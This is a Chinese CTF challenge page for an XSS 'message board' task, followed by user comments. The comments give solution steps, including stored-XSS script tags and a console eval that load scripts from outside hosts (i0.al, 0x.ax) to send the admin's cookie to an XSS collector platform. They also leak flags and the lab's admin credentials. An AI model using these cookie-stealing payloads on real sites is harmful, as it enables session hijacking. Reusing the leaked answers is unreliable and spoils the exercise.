留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3242
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(18)
解题动态
liqs 攻破了该题 1天前
AzKanna 攻破了该题 2天前
jsbba 攻破了该题 4天前
2686213396 攻破了该题 4天前
sdgkk1234 攻破了该题 5天前
2kniden 攻破了该题 6天前
乱来小木 攻破了该题 7天前
lanza2451150 攻破了该题 8天前
WindZQ 攻破了该题 10天前
言寺介 攻破了该题 17天前
19902457330 攻破了该题 17天前
hhhh3 攻破了该题 18天前
LL77 攻破了该题 18天前
丞丞 攻破了该题 18天前
橙zi 攻破了该题 18天前
1111a 攻破了该题 18天前
aqsdd 攻破了该题 18天前
dask 攻破了该题 18天前
popk 攻破了该题 18天前
评论
yangc 2年前
举报
1.在xss平台上注册,建项目,生成xss语句。 2.在留言框内插入xss语句。 3.在xss平台收到cookie,得到flag。 4.将收到的flag进行在线URI解码。
神里凌华 2年前
举报
5金币做完给3金OuO
晚风 2年前
举报
flag{211d9b5b0ae2f9adfc8136e7a8d5aa3d}后面跟上/admin.php user: admin password: 011be4d65feac1a8登录,检查,找到相应的位置就能看见flag
piying 2年前
举报
思路:登录XSS平台https://xss.pt/,将如下代码植入<sCRiPt sRC=//i0.al/qUc5></sCrIpT>留言框,点击雁过留声,路过留言;在XSS平台查看得到flag,然后URL解码,得到flag{2276f57f5da12355e4525c634337aa06}
107zsm 2年前
举报
UrlEncode编码/解码
几度夕阳红 2年前
举报
我认为的正常思路:1、在留言板插入XSS代码 2、管理员观看留言,触发XSS代码 3、XSS平台接收到管理员cookie信息,这里的cookie就是flag。但是不知道靶场是否实现了管理员触发XSS的机制,XSS平台一直未接收到信息。大家伙的解法,使用工具扫描网站,发现admin.php,和你大概率扫不到的db.sql文件,db.sql有admin的账号密码。登录admin界面,会触发你写入的XS
Robuntu 2年前
举报
@harry 大佬,我用的xss平台一直没有收到信息,请问是payload的问题吗
harry 管理员 2年前
举报
已经实现了管理员触发XSS的机制
星之队队大队长 2年前
举报
先输入payload 然后 admin.php user: admin password: 011be4d65feac1a8 登录即可
问题小子 2年前
举报
纯小白,这道题怎么做啊
xcxy 2年前
举报
用御剑工具扫描不出文件目录,直接xss平台代码插入就行了,也不用变形,能够收到cookie : flag=flag%7B5b10e075f4319e7f628f6813ca4a1904%7D,这个是url编码,解码就行了。题目应该是改了,太简单了
32130262 2年前
举报
我用xss.pt生成的脚本,放入留言框里,换了很多格式。还使用F12 console 里输入javascript:eval('window.s=document.createElement("script");window.s.src="https://0x.ax/o0fK";document.body.appendChild(window.s)'),xss